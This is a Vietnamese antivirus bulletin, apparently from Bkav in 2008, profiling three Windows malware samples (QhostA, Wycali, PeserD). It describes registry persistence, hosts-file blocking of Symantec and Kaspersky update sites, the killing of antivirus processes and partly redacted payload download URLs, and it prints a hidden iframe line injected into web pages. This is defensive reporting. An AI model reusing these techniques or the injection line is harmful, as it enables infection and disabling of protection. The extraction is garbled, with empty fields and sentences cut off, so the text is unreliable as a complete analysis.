Cách thức lây nhiễm: Cách phòng tránh: Mô tả kỹ thuật: Copy bản thân vào file "%SysDir%\iexplore.exe" và tạo key run để khởi động mỗi khi bật máy [HKLM\...\Windows\CurrentVersion\R
Trang 1 Tên malware: W32.QhostA.Trojan
Thuộc họ: W32.Qhost.Trojan
Loại: Trojan
Xuất xứ: Nước ngoài
Ngày phát hiện mẫu: 17/04/2008
Kích thước: 83 Kb
Mức độ phá hoại: Trung bình
Nguy cơ:
Hiện tượng:
kaspersky.com, avast.com
Cách thức lây nhiễm:
Cách phòng tránh:
Mô tả kỹ thuật:
Copy bản thân vào file "%SysDir%\iexplore.exe" và tạo key run để khởi động mỗi khi bật máy [HKLM\ \Windows\CurrentVersion\Run]
"Microsoft Internet Explorer" = "%SysDir%\iexplore.exe"
Sửa file host để ngăn không cho người dùng truy nhập vào các trang:
Trang 2 127.0.0.1 liveupdate.symantecliveupdate.com
Trang 3 127.0.0.1 dnl-cn1.kaspersky-labs.com
key run: [HKLM\ \Windows\CurrentVersion\Run] với giá trị "Advanced DHTML Enable" = %SysDir%\%random_name%.exe
Chuyên viên phân tích : Tô Đình Hiệp
11 Bkav1672 (23/05/2008) cập nhật lần thứ 1: VetorDH, WycaliB
Malware cập nhật mới nhất:
Tên malware: W32.Wycali.Worm
Thuộc họ: W32.Wycali.Worm
Loại: Worm
Xuất xứ: Trung Quốc
Ngày phát hiện mẫu: 22/05/2008
Kích thước: 9Kb
Mức độ phá hoại: Cao
Nguy cơ:
Hiện tượng:
Cách thức lây nhiễm:
Cách phòng tránh:
các trang web đen, độc hại
Mô tả kỹ thuật:
Trang 4 Tắt các process : avp.exe, kvsrvxp.exe, kissvc.exe
QQDoctorMain.exe Đổi tên session cuối thành ".WYCao" nên một số
chương trình ứng dụng sẽ không chạy được
đó vào cuối tất cả các file có đuôi : do, htm, html, shtm, shtml, asp,
.aspx, php, jsp, cgi, xml
http://1.fo[removed]00.net/a1.exe
http://1.fo[removed]d00.net/a36.exe
Chuyên viên phân tích : Nguyễn Công Cường
Một số malware đáng chú ý cập nhật cùng ngày: W32.AmvoDH.Worm,
W32.Bilano.Trojan, W32.CyberAle.Adware, W32.DownloadAB.Trojan, W32.KavoXLF.Worm, W32.OnGamesXAA.Trojan, W32.Piery.Trojan, W32.FloodBlack.Trojan, W32.RejoicerC.Worm, W32.SpybotV.Trojan, W32.FakeAlertXA.Trojan, W32.CeekatK.Rootkit, W32.ProxyA.Trojan, W32.VetorDH.PE
12 Bkav1680 - Phát hành lần thứ 2 ngày 28/05/2008, cập nhật QuikMsg,
AvpB, CinmusXF, KavoADS, NTRootB, PeserD, PeserE
Malware cập nhật mới nhất:
Tên malware: W32.PeserD.Worm
Thuộc họ: W32.Peser.Worm
Loại: Worm
Xuất xứ: Nước ngoài
Ngày phát hiện mẫu: 28/05/2008
Kích thước: 61Kb
Mức độ phá hoại: Cao
Nguy cơ:
Trang 5 Làm hỏng các file thực thi đã được pack
Hiện tượng:
Cách thức lây nhiễm:
Cách phòng tránh:
các trang web đen, độc hại
Mô tả kỹ thuật:
Tạo service : "Windows WorkStation" để virus được kích hoạt mỗi khi Windows khởi động
Tạo mutex : "PEINFECT" để chỉ 1 virus cùng loại chạy trên 1 máy
Copy bản thân thành file có tên "mscrss.exe" vào thư mục %SysDir%
http://ieopen.yhg[removed]es.com/iedown/down/upbho.exe
Chèn thêm vào các file : cgi, php, jsp, asp, html, htm dòng sau :
<iframe src="http://pk.yhg[removed]es.com/index.htm" width="0"
height="0"></iframe>
Tìm và lây nhiễm code độc vào các file *.exe (ngoại trừ thư mục Windows và ProgramFiles), đồng thời ghi bản thân